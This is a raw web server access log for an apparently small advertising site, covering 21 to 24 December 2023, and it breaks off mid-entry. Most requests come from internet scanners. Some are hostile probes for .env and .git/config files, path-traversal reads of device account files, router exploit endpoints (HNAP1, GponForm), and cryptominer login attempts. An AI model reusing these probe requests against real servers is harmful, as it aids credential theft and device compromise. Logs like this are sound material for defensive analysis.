Ad Budgets Inc., 67.218.15.25, AdBudgets.com web server log entries:

December 21, 2023

Keep in mind, 209.191.192.102 is the Seesip office IP address. It is the only IP from the Paul Bunyan Communications 209.191.192.0/19 IP block in ANY of the Seesip log files.

209.191.192.102 - - [21/Dec/2023:20:43:01 -0600] "GET /MetArena.jpg HTTP/1.1" 404 491 "http://67.218.15.25/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

209.191.192.102 - - [21/Dec/2023:20:43:03 -0600] "GET / HTTP/1.1" 200 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

209.191.192.102 - - [21/Dec/2023:20:45:12 -0600] "GET / HTTP/1.1" 304 179 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

198.235.24.247 - - [21/Dec/2023:21:41:49 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

35.203.210.237 - - [21/Dec/2023:21:42:03 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

62.72.164.10 - - [21/Dec/2023:21:48:05 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

178.128.191.53 - - [21/Dec/2023:21:54:57 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/120.0"

35.195.93.98 - - [21/Dec/2023:22:02:30 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

185.224.128.191 - - [21/Dec/2023:22:05:00 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

209.191.192.102 - - [21/Dec/2023:22:51:08 -0600] "GET / HTTP/1.1" 304 179 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

36.156.22.4 - - [21/Dec/2023:23:10:19 -0600] "GET / HTTP/1.0" 200 260 "-" "-"

36.156.22.4 - - [21/Dec/2023:23:10:22 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36"

36.156.22.4 - - [21/Dec/2023:23:10:23 -0600] "GET /robots.txt HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36"

36.156.22.4 - - [21/Dec/2023:23:10:23 -0600] "GET /.well-known/security.txt HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36"

December 22, 2023

134.122.100.150 - - [22/Dec/2023:00:08:04 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

149.50.96.45 - - [22/Dec/2023:00:51:07 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

149.50.96.45 - - [22/Dec/2023:00:51:07 -0600] "POST /HNAP1/ HTTP/1.1" 404 491 "-" "Mozila/5.0"

193.32.162.174 - - [22/Dec/2023:01:23:52 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

193.106.29.122 - - [22/Dec/2023:01:57:19 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0"

57.128.141.133 - - [22/Dec/2023:02:16:08 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.147 Safari/537.36"

212.70.149.142 - - [22/Dec/2023:02:23:00 -0600] "\x03" 400 0 "-" "-"

64.62.197.230 - - [22/Dec/2023:02:30:49 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0"

64.62.197.233 - - [22/Dec/2023:02:32:33 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"

64.62.197.240 - - [22/Dec/2023:02:33:17 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0"

198.199.113.38 - - [22/Dec/2023:03:15:44 -0600] "GET /portal/redlion HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

178.79.166.22 - - [22/Dec/2023:03:37:24 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

178.79.166.22 - - [22/Dec/2023:03:37:28 -0600] "\x16\x03\x01" 400 0 "-" "-"

178.79.166.22 - - [22/Dec/2023:03:37:28 -0600] "\x16\x03\x01" 400 0 "-" "-"

178.79.166.22 - - [22/Dec/2023:03:37:28 -0600] "\x16\x03\x01" 400 0 "-" "-"

185.180.140.4 - - [22/Dec/2023:04:00:44 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

185.180.140.4 - - [22/Dec/2023:04:00:44 -0600] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

177.131.127.165 - - [22/Dec/2023:05:39:31 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

107.170.231.23 - - [22/Dec/2023:05:55:36 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

62.72.164.10 - - [22/Dec/2023:06:29:17 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

184.105.139.70 - - [22/Dec/2023:07:37:49 -0600] "\x16\x03\x01" 400 0 "-" "-"

170.64.190.146 - - [22/Dec/2023:07:54:58 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/120.0"

138.197.44.132 - - [22/Dec/2023:08:02:44 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/120.0"

190.2.143.136 - - [22/Dec/2023:08:46:42 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

78.153.140.219 - - [22/Dec/2023:08:56:49 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

78.153.140.219 - - [22/Dec/2023:08:56:50 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

193.32.162.174 - - [22/Dec/2023:09:01:34 -0600] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 486 "-" "Mozilla/5.0 zgrab/0.x"

194.165.16.73 - - [22/Dec/2023:09:31:51 -0600] "\x03" 400 0 "-" "-"

193.32.162.174 - - [22/Dec/2023:10:02:43 -0600] "GET /../../mnt/mtd/Config/Account2 HTTP/1.1" 400 486 "-" "Mozilla/5.0 zgrab/0.x"

198.244.213.98 - - [22/Dec/2023:11:25:28 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.147 Safari/537.36"

209.191.192.102 - - [22/Dec/2023:13:13:28 -0600] "GET / HTTP/1.1" 304 179 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

209.191.192.102 - - [22/Dec/2023:13:13:28 -0600] "GET /favicon.ico HTTP/1.1" 404 490 "http://67.218.15.25/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

67.49.25.169 - - [22/Dec/2023:13:54:29 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

167.248.133.51 - - [22/Dec/2023:15:14:08 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

167.248.133.51 - - [22/Dec/2023:15:14:09 -0600] "PRI * HTTP/2.0" 400 0 "-" "-"

167.248.133.51 - - [22/Dec/2023:15:14:09 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

162.216.150.211 - - [22/Dec/2023:18:45:53 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

103.143.195.161 - - [22/Dec/2023:19:36:28 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

65.49.1.18 - - [22/Dec/2023:20:26:01 -0600] "\x16\x03\x01" 400 0 "-" "-"

34.140.248.32 - - [22/Dec/2023:21:47:27 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

78.153.140.221 - - [22/Dec/2023:22:17:07 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

78.153.140.221 - - [22/Dec/2023:22:17:07 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

31.220.1.83 - - [22/Dec/2023:22:37:14 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

104.152.52.129 - - [22/Dec/2023:22:59:40 -0600] "GET / HTTP/1.0" 200 260 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"

74.82.47.5 - - [22/Dec/2023:23:43:25 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"

74.82.47.5 - - [22/Dec/2023:23:45:56 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX)"

74.82.47.5 - - [22/Dec/2023:23:46:50 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"

198.199.104.98 - - [22/Dec/2023:23:54:02 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

December 23, 2023

61.1.135.16 - - [23/Dec/2023:00:25:57 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"

20.0.145.106 - - [23/Dec/2023:01:08:16 -0600] "GET //.env HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

205.210.31.84 - - [23/Dec/2023:01:31:04 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

165.232.32.137 - - [23/Dec/2023:02:04:45 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

1.202.112.231 - - [23/Dec/2023:02:26:23 -0600] "GET / HTTP/1.0" 200 260 "-" "-"

36.32.2.66 - - [23/Dec/2023:02:26:28 -0600] "\x16\x03\x01" 400 0 "-" "-"

60.17.98.252 - - [23/Dec/2023:02:26:46 -0600] "USER anonymous" 400 0 "-" "-"

222.181.11.136 - - [23/Dec/2023:02:27:41 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"

125.84.238.145 - - [23/Dec/2023:02:27:42 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"

198.235.24.167 - - [23/Dec/2023:02:39:48 -0600] "\x16\x03\x01" 400 0 "-" "-"

198.235.24.167 - - [23/Dec/2023:02:39:48 -0600] "\x16\x03\x01" 400 0 "-" "-"

93.88.110.1 - - [23/Dec/2023:03:34:09 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

84.54.51.108 - - [23/Dec/2023:03:37:36 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"

103.56.61.130 - - [23/Dec/2023:04:21:19 -0600] "\x16\x03\x01" 400 0 "-" "-"

103.56.61.130 - - [23/Dec/2023:04:21:22 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36"

103.56.61.130 - - [23/Dec/2023:04:21:23 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.56.61.130 - - [23/Dec/2023:04:21:27 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.56.61.130 - - [23/Dec/2023:04:21:31 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.56.61.130 - - [23/Dec/2023:04:21:33 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.56.61.130 - - [23/Dec/2023:04:21:39 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.56.61.130 - - [23/Dec/2023:04:21:39 -0600] "\x16\x03\x01" 400 0 "-" "-"

188.124.12.239 - - [23/Dec/2023:04:58:28 -0600] "GET /manager/html HTTP/1.1" 404 491 "-" "python-requests/2.27.1"

185.91.127.66 - - [23/Dec/2023:05:05:44 -0600] "CONNECT google.com:443 HTTP/1.1" 405 501 "-" "Go-http-client/1.1"

167.94.138.34 - - [23/Dec/2023:05:24:57 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.138.34 - - [23/Dec/2023:05:25:00 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.34 - - [23/Dec/2023:05:25:00 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.138.34 - - [23/Dec/2023:05:25:00 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

185.170.144.3 - - [23/Dec/2023:06:29:14 -0600] "\x03" 400 0 "-" "-"

185.224.128.191 - - [23/Dec/2023:07:05:43 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

192.241.197.17 - - [23/Dec/2023:07:23:40 -0600] "GET /druid/index.html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

162.243.131.24 - - [23/Dec/2023:07:31:32 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

62.233.50.179 - - [23/Dec/2023:08:39:49 -0600] "\x03" 400 0 "-" "-"

38.137.12.21 - - [23/Dec/2023:09:00:09 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

194.233.94.166 - - [23/Dec/2023:10:21:29 -0600] "GET /.env HTTP/1.1" 404 491 "-" "python-requests/2.28.1"

185.247.224.137 - - [23/Dec/2023:10:34:32 -0600] "GET / HTTP/1.1" 200 241 "-" "fasthttp"

178.72.69.19 - - [23/Dec/2023:11:55:35 -0600] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 488 "-" "Hello, World"

83.97.73.87 - - [23/Dec/2023:12:21:48 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

185.247.224.137 - - [23/Dec/2023:12:46:26 -0600] "GET /.git/config HTTP/1.1" 404 454 "-" "SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0"

83.97.73.87 - - [23/Dec/2023:13:18:29 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

152.32.236.30 - - [23/Dec/2023:15:04:38 -0600] "GET / HTTP/1.1" 200 241 "-" "curl/7.29.0" 152.32.236.30 - - [23/Dec/2023:15:04:38 -0600] "\x16\x03\x01" 400 0 "-" "-" 152.32.236.30 - - [23/Dec/2023:15:04:39 -0600] "t3 12.1.2\n" 400 0 "-" "-"

117.233.223.154 - - [23/Dec/2023:15:13:11 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

84.54.51.108 - - [23/Dec/2023:16:03:44 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"

91.92.244.94 - - [23/Dec/2023:17:13:16 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.244.94 - - [23/Dec/2023:17:13:17 -0600] "POST /HNAP1/ HTTP/1.1" 404 491 "-" "Mozila/5.0"

45.142.182.76 - - [23/Dec/2023:17:23:00 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

62.233.50.179 - - [23/Dec/2023:17:54:09 -0600] "\x03" 400 0 "-" "-"

209.191.192.102 - - [23/Dec/2023:17:54:22 -0600] "GET / HTTP/1.1" 200 297 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

209.191.192.102 - - [23/Dec/2023:17:54:22 -0600] "GET /favicon.ico HTTP/1.1" 404 490 "http://67.218.15.25/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

207.46.13.230 - - [23/Dec/2023:17:59:37 -0600] "GET /robots.txt HTTP/1.1" 404 491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"

40.77.167.64 - - [23/Dec/2023:17:59:38 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"

91.92.244.94 - - [23/Dec/2023:18:16:24 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.244.94 - - [23/Dec/2023:18:16:32 -0600] "POST /HNAP1/ HTTP/1.1" 404 491 "-" "Mozila/5.0"

193.118.51.134 - - [23/Dec/2023:18:23:29 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"

118.123.105.85 - - [23/Dec/2023:18:30:02 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 118.123.105.85 - - [23/Dec/2023:18:30:05 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" 118.123.105.85 - - [23/Dec/2023:18:30:07 -0600] "GET /robots.txt HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" 118.123.105.85 - - [23/Dec/2023:18:30:10 -0600] "GET /.well-known/security.txt HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36"

198.235.24.64 - - [23/Dec/2023:19:01:06 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

78.153.140.219 - - [23/Dec/2023:20:59:46 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.219 - - [23/Dec/2023:20:59:46 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

107.170.237.50 - - [23/Dec/2023:21:14:33 -0600] "GET /manager/html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

34.76.158.233 - - [23/Dec/2023:21:32:16 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

185.224.128.191 - - [23/Dec/2023:21:47:30 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

20.0.145.106 - - [23/Dec/2023:22:41:37 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

45.142.182.76 - - [23/Dec/2023:22:45:40 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

222.217.86.135 - - [23/Dec/2023:23:26:44 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

December 24, 2023

66.240.205.34 - - [24/Dec/2023:00:27:31 -0600] "Gh0st\xad" 400 0 "-" "-"

162.216.149.49 - - [24/Dec/2023:00:36:38 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

123.58.207.155 - - [24/Dec/2023:01:24:44 -0600] "\x16\x03\x01\x01\x17\x01" 400 0 "-" "-" 123.58.207.155 - - [24/Dec/2023:01:24:55 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 123.58.207.155 - - [24/Dec/2023:01:25:01 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 123.58.207.155 - - [24/Dec/2023:01:25:02 -0600] "GET /robots.txt HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 123.58.207.155 - - [24/Dec/2023:01:25:03 -0600] "GET /sitemap.xml HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 123.58.207.155 - - [24/Dec/2023:01:25:10 -0600] "GET /cgi-bin/admin_console.cgi HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"

212.107.224.16 - - [24/Dec/2023:01:32:06 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

162.142.125.223 - - [24/Dec/2023:01:52:32 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 162.142.125.223 - - [24/Dec/2023:01:52:35 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.223 - - [24/Dec/2023:01:52:35 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 162.142.125.223 - - [24/Dec/2023:01:52:35 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

198.235.24.194 - - [24/Dec/2023:02:02:47 -0600] "\x16\x03\x01" 400 0 "-" "-" 198.235.24.194 - - [24/Dec/2023:02:02:47 -0600] "\x16\x03\x01" 400 0 "-" "-"

91.92.249.164 - - [24/Dec/2023:02:41:42 -0600] "GET /.git/config HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

185.91.69.110 - - [24/Dec/2023:04:07:56 -0600] "\x16\x03\x01\x02" 400 0 "-" "-" 185.91.69.110 - - [24/Dec/2023:04:07:57 -0600] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n" 400 0 "-" "-" 185.91.69.110 - - [24/Dec/2023:04:07:57 -0600] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n" 400 0 "-" "-" 185.91.69.110 - - [24/Dec/2023:04:07:57 -0600] "{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0xd96a439a14aac8bba37164ddf4a51dcfd73a0bb7\",\"x\"],\"jsonrpc\":\"2.0\"}\n" 400 0 "-" "-" 185.91.69.110 - - [24/Dec/2023:04:07:58 -0600] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"46zsYAFMCph54u3yJ41cFi1pi6RYAPNaoLS4GjDrfAjN4yJqaufUViUcMHeK7zUWJ5T4Np4miDDViQGuMqCnFkqX4Paa7xX\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n" 400 0 "-" "-" 185.91.69.110 - - [24/Dec/2023:04:07:58 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:07:58 -0600] "POST / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:07:58 -0600] "POST / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:07:59 -0600] "GET /WuEL HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" 185.91.69.110 - - 